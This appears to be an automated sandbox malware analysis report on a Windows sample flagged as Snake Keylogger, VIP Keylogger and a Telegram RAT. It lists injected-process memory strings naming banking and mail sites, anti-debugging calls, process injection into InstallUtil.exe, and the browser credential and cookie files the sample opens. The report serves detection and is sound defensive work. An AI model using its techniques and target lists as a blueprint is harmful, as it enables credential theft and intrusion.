Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
Source: wscript.exe, 00000003.00000002.1180172050.000002A368463000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: InstallUtil.exe, 00000002.00000002.3511344558.0000000003788000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $oqEmultipart/form-data; boundary=------------------------8dd6e5279ae1ec9<
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: InnerException.exe, 00000004.00000002.1196368845.0000000002441000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: InstallUtil.exe, 00000005.00000002.3506450172.000000000070F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3512080381.00000000027B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $oqEmultipart/form-data; boundary=------------------------8dd6e4cbcbe1ca5<
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003910000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
Source: InstallUtil.exe, 00000005.00000002.3518981663.0000000003944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SKM_72059114803.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F59698 LdrInitializeThunk, 5_2_05F59698
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040CE09
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 2_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 2_2_004019F0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040ADB0 GetProcessHeap,HeapFree, 2_2_0040ADB0
Enables debug privileges
Source: C:\Users\user\Desktop\SKM_72059114803.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004123F1 SetUnhandledExceptionFilter, 2_2_004123F1
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41B000 Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000 Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 426000 Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 115C008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41B000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 426000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 396008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SKM_72059114803.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetLocaleInfoA, 2_2_00417A20
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SKM_72059114803.exe Queries volume information: C:\Users\user\Desktop\SKM_72059114803.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Queries volume information: C:\Users\user\AppData\Roaming\InnerException.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 2_2_00412A15
Source: C:\Users\user\Desktop\SKM_72059114803.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000002.00000002.3511344558.0000000003601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3512080381.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3507858654.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6952, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3507858654.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6952, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3517877322.000000000468D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3507858654.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6952, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000002.00000002.3511344558.0000000003601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3512080381.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3507858654.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6952, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE
